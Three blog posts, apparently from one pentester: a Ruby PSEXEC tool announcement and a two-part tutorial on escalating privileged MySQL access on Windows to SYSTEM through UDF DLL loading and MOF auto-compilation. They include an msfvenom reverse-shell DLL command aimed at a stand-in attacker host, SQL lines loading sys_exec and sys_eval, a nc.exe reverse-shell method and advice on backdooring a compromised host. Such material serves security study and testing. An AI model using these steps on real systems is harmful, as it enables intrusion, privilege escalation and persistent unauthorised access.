Yet Another SMB PSEXEC (Y.A.S.P) Tool

I was working on my own version of an updated standalone PSEXEC tool in ruby, leveraging the MSF standalone as a base along with some of the newer modules that have been released. Unfortunately SMBEXEC 2.0 was recently released which pretty much does the same thing functionality wise but has threading so its probably a bit cooler but thought I would still post mine out there for anyone who cares to take it for a spin. It is single target focused and a little different in the look and feel in comparison to some of the others available so who knows. It works for me, hope it works for someone else too....

I first started off trying to do things on my own by writing classes to wrap the smbclient tool which now supports the pass-the-hash option or can be fairly easily patched to address this. This Samba suite also includes the rpcclient tool which I originally planned to leverage to make some magic happen. Well I got the wrappers working, but was not able to get things fully working with just these two classes. I do recommend playing around with rpcclient as it is an interesting tool and can lead to a lot of insight against a remote target but that's another story. So after giving up on the rpcclient option i did some checking on the net and found some great references from Mubix and Chris Gates on the MSF standalone tool and some ways to play with it. As Chris and Rob point out the librex library is available outside of MSF as a standalone gem which gives you tons of power to do all kinds of neat things on your own. Being that the hard work was already done and available as reference in MSF i decided to borrow what i could from there and merge with my own wrappers and code to get what I wanted. The end result is an smbclient with all the psexec fun and then some.

It can do some basic recon without creds, which I am working on improving but its main focus is on re-using valid credentials. Once authenticated it's capable of running single commands using the PSEXEC technique or jumping into a pseudo shell to execute multiple commands.

Download registry hives for offline pillaging

Leverage MSFVENOM to generate shellcode and then run payloads using PowerShell (my favorite):

NOTE: You need to specify the hostname for Vista+ targets or connection will fail. You can use raw netbios requests or tool like nbtscan to find this pretty quickly and without any pain. On older targets you can omit this field for connection configuration.

The full list of available options once authenticated:

And here are a few demo videos I made to show off how you can use it....

Y.A.S.P. vs Standalone 2k3 Server:



Y.A.S.P. + PowerShell Payload vs Windows 7:
NOTE: It does leverage MSFVENOM currently to generate shellcode which gets converted over to PowerShell acceptable format and then executed via PowerShell command




Y.A.S.P. vs 2k3 Domain Controller + Active Directory Dumping 101:



You can find all the source code along with all the tools used or referenced in the above videos on my github page here: SOURCE + TOOLS

You can keep an eye on Github as I will be working on this one over time to smooth out a few things and add a few more things to it which I wasn't comfortable with rolling out just yet but again just sharing to share and inspire more coders to code cool shit. Until next time, Enjoy!

Battling Windows MySQL: From root to SYSTEM (Part II: User Defined Function (UDF) Exploitation)

This is part 2 of a 2 part series on exploiting Windows MySQL instances to gain high privileged shell access. This part will focus on exploiting MySQL User Defined Functions (UDF) through feeding them malicious DLL files at function creation and linkage time. The methods will follow very similar course to our first .MOF exploitation technique. We will will need to upload a binary payload, this time instead of an EXE file it will be a DLL file but should not really affect our uploading method we created previously. Our magic location will be changing however....

MySQL has a feature to allow administrative users to add additional functions and procedures to help extend its abilities. These User Defined Functions are mapped to a .SO file on Unix systems and .DLL files on Windows systems at function creation time. It is this linked trust that we will be exploiting to gain code execution. MySQL looks for these functions instructions in the MySQL plugins directory. This directory value can be queried by checking the @@plugins_dir value. If this is not available for whatever reason you can use a query "SHOW VARIABLES LIKE 'basedir';" and then fill in the '/lib/plugins/' path to the end of the value received. Make sure you escape paths when re-using this value if your coding this or you will run into issues ;)

We upload a binary (payload.dll) to the plugins directory (c:\SOMEPATH\bin\mysql\mysql5.5.24\lib\plugin\)....using our code from part I this can be easily accomplished...

We then create a function which triggers our DLL payload:
SQL QUERY: CREATE FUNCTION fake_function_name RETURNS string SONAME 'payload.dll';

MySQL will look in the plugin directory for 'payload.dll' to load into memory and then look for the needed information to build the functions and then make available to users. If you have a legitimate UDF DLL/SO file being loaded then it will create the function and you can then make use of those functions in MySQL immediately after. If the DLL/SO file doesn't not have proper headers and can't be loaded to not finding the function name and associated code, it will fail to create the function. This is no real concern to us hackers/auditors/pentesters/whomeveryouare as at this point it is already over. The code execution occurs as soon as it is loaded to check! The UDF file we write will remain on target, but no function to cleanup after. You can generate DLL payload files with MSF fairly easy to make this nice and easy to pass things off to MSF. I have found it best in my experience to roll in first with a standard command shell and then use MSF session upgrade option to upgrade from normal shell to a meterpreter session. It will actually run the needed commands through the existing channel and then using a command stager will generate a new connection for the meterpreter so you will end up with two sessions when it is complete.

MSFVENOM PAYLOAD GENERATION: msfvenom -p windows/shell/reverse_tcp LHOST=ATTACKERIP LPORT=4444 -f dll > payload.dll
MSF SESSION UPGRADE (Post Exploit): sessions -u <sessionID#>

New Ruby Code Additions to our previous snippet (write_bin_file() was used to house our code from part I for uploading):

Now the author of SQLMAP helped to write and publish some custom user defined functions which allow one to interact with the underlying operating system. We can use these to upload and successfully create new functions which will allow us to execute code through SQL queries leveraging the UDF functions. The entire UDF package has 3-5 functions, but for us we care mostly about 2 - sys_exec() & sys_eval(). The first, sys_exec(), allows one to run a system command through it and returns 0 on success or 1 on failure or other. This can be leveraged to execute blind commands. If you need the command output then you will need to go with the sys_eval() function which allows you to run commands AND grab the output from results. The key when your setting up your new functions is making sure you define the results data type properly. If you have uploaded the lib_mysqludf_sys.dll then you can perform the following queries to load the custom functions:

SQL: CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
SQL: CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';
NOTE: small difference in integer vs string result expectations!

I have focused on Windows as this yields greatest success. Unix systems are also vulnerable to the UDF attack (MOF is windows only) however most modern systems implement AppArmor or other techniques which prevent the MySQL user from writing to the needed plugins directory to pull it off. This means you need root privileges to get things to work. Not very common for MySQL to be running as root, but you never know. That being said, it is a nice way to backdoor a system post compromise as you can leverage the sys_exec() or sys_eval() functions to achieve command execution as a way back in. These functions can be accessed via direct connection or through SQL injection, anywhere you can execute SQL queries which can call the necessary functions so I am sure you can think of some sneaky way to use it.

VIDEO DEMO: YouTube

Download Full Exploiter Pack: DOWNLOAD
NOTE: contains UDF DLLs for sys exec functions as well as template for reverse shell in /payloads

UPDATE: You can now find this on my Github page here: https://github.com/Hood3dRob1n/SQLi

Pure Ruby Core Source Code: PASTEBIN

Hope you have enjoyed this two part series. These methods can be used outside of MySQL exploitation but this is an angle I was not previously familiar with and yields very high payouts when it works so thought I would share and highlight this more for others....

Until next time, Enjoy!

Battling Windows MySQL: From root to SYSTEM (Part I: MOF Exploitation)

In this two part series I am going to share two methods you can use to gain command execution against Windows MySQL instances when you have privileged MySQL user account. First here in part one, I will cover MOF exploitation technique and then in part 2 I will go over the UDF (User Defined Function) DLL Injection method. They both exploit the MySQL Service which on Windows typically runs as SYSTEM so this can be a very high payout for the exploit as SYSTEM level access means full compromise of the local box if successful. The MOF exploit is very stable and works against pre-Vista machines like XP and Server 2003 while UDF method has less restrictions.

What the heck is a .MOF File?
First and foremost this is a Windows specific file format so automatically rules out non-Windows based targets, sorry. Some nice quotes i pulled from the web "A MOF file contains MOF language statements, compiler directives and comments". "A MOF file can be encoded in either Unicode or UTF-8 format. MOF files are text files that contains definitions of classes and instances using the Managed Object Format (MOF) language." We can leverage their design to use JScript, ActiveXObject and WScript.Shell to run commands or whatever other cool wizardry you can come up with. The code in these files is fairly harmless until it is compiled by a binary tool which comes on windows boxes called 'mofcomp.exe'. The Managed Object Format (MOF) compiler (mofcomp.exe) parses the passed files and adds the classes and class instances defined in the file to the WMI repository which allows the magic to happen. If you want to read more on mofcomp.exe check here. If you want to write your own custom .MOF file to do even more whimsical magic sorcery?. Read up on the specs and requirements here.

Now in Pre-Vista Windows there is a magical home for .MOF files which need compiling by mofcomp.exe tool, and this is at 'c:\windows\system32\wbem\mof\'. Apparently on pre-Vista versions this directory is periodically scanned for new additions. Anything new it finds is passed along to mofcomp.exe and auto-compiled, no human interaction needed. This is our ticket to privilege escalation or our way in when it comes to exploiting MySQL for command execution with this technique. On Windows MySQL tends to run as a privileged user and there are no default restrictions to where this user can write as result - which means we can write files to this magic directory as MySQL user! If we can craft a .MOF template sneaky enough and write it there, it will auto-compile it running our code inside. I should note that after it is compiled by mofcomp.exe it is moved into the 'c:\windows\system32\wbem\mof\good\' directory, if anything fails during compiling it is moved to 'c:\windows\system32\wbem\mof\bad\'. It is worth mentioning that there is also a log file for all mofcomp.exe actions taken which can be found at 'c:\windows\system32\wbem\Logs\mofcomp.log'. This log contains a time-stamp and reference to files compiled along with any errors encountered.

FUN FACT: If you write files here and have them compiled, they will run repeatedly until deleted. Also due to this cyclical nature you can end up with commands occasionally running one more time even after removal of the actual .MOF payload file. For example if you run a onetime instance to create a new user account. It will keep being created if the admin doesn't find the MOF file and simply keeps trying to delete the account itself.....re-appearing accounts for red team pranks anyone?


Connecting the dots to get a shell:
Now that you know about this magical place, and you have read my previous tutorials on writing files with MySQL this wont be a giant leap for us. We first will need to come up with a way to upload a binary file from our local machine to the remote machine. In order to do this we read the file in binary mode, then convert to hex formatting to make injection easy. We will also make a point of using DUMPFILE so its writing as a single line and wont mess with our binary format. Once the file is written, it happens almost instantly but may take a minute or two to get scanned and run so be patient before completely walking away.

Ruby Code to Read Binary and Upload (passed a db connection object, the local file path, and the destination path on target):


Now when it comes to the .MOF template for code execution with this method i borrowed what I could find to suit my needs. I actually found a random PHP version of this exploit sitting on a server I was auditing! It was using a simple template to run commands one at a time through WScript.Shell.run() so I used that as a base for command execution as it compiles without issues in all my tests. I then took the beefier version from MSF found in the /msf/lib/msf/core/exploit/wbemexec.rb script and used for their version of this exploit. This .MOF template takes the location to binary.exe to run (it also has some built-in cleanup code to remove files after). We can use either template to our liking, we can use the simpler template to execute single command at a time or we can use the fancy template to run a binary (which we need to upload before hand). I came up with some code to leverage these features and techniques to achieve code execution, raw binary file uploading via SQL, reverse shell via uploading of nc.exe and then running single command to call home with cmd.exe attached. Below is a quick video demonstration to show you how things can work with the MOF exploit when you find yourself with privileged user access to MySQL on Windows box. You can also find the source code and download links below that.

VIDEO: YouTube

Download Full Exploiter Pack: DOWNLOAD
NOTE: Contains nc.exe & sbd.exe in /payloads)

UPDATE: You can now find this on my Github page here: https://github.com/Hood3dRob1n/SQLi

Pure Ruby Core Source Code: PASTEBIN






Food for thought: This method supposedly doesn't work on newer instances due to them not auto-compiling the .MOF files like we see done with XP and 2k3 systems. Not tested but curious what happens if we pre-compile with mofcomp.exe ourselves and then write to the updated /good/ location.....

Until next time, Enjoy!